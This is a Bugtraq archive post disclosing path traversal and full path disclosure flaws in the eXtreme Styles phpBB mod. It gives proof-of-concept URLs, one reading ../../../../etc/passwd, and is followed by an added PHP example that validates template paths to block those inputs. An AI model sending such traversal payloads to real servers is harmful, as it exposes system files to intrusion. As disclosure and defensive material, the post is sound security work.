Bugtraq mailing list archives
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
From: tommie1 () adelphia net
Date: 3 Dec 2005 13:29:02 -0000
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
====================================================
http://www.phpbbstyles.com/

Description
===========
These vulnerabilities could allow an attacker that has gained administrative access to view file content on the system.

1. Remote File Content Disclosure
=======================
In xs_edit.php, the "edit" request field is not properly sanitized.

2. Full Path Disclosure
=======================
In xs_edit.php, the "viewbackup" request field is not properly sanitized.

Proof of Concept
================
1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd
2. http://forum/admin/xs_edit.php?edit=&viewbackup=1

--------------
http://wtf.bz/
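A containment check that rejects the `edit` value from proof of concept 1 and the empty `edit` value from proof of concept 2, as an added example (not part of the original post and not eXtreme Styles code). The function name `xs_resolve_template_path`, the `subSilver/index_body.tpl` sample file and the temporary base directory are assumptions made for illustration.

```php
<?php
// Added example, not eXtreme Styles code. The function name and the
// directory layout are hypothetical.

/**
 * Resolve a user-supplied relative file name inside $baseDir.
 * Returns the canonical path, or null if the request is empty, missing,
 * not a regular file, or resolves outside $baseDir.
 */
function xs_resolve_template_path(string $baseDir, string $requested): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" sequences and follows symlinks, so the
    // comparison below is made on the file that would really be opened.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Require base directory plus separator as the prefix, so that
    // "/srv/templates_old/x" does not pass for base "/srv/templates".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a temporary directory stands in for the templates folder.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'xs_demo_' . getmypid();
@mkdir($base . '/subSilver', 0700, true);
file_put_contents($base . '/subSilver/index_body.tpl', '<!-- demo -->');

foreach (['subSilver/index_body.tpl', '../../../../etc/passwd', ''] as $edit) {
    $path = xs_resolve_template_path($base, $edit);
    // On failure, answer with a generic message; never echo the resolved
    // path or a raw PHP warning back to the client.
    echo var_export($edit, true), ' => ', $path === null ? 'rejected' : 'allowed', "\n";
}
```

Returning only a generic "rejected" result for bad or empty input, with PHP's `display_errors` turned off in production, keeps filesystem paths out of the response.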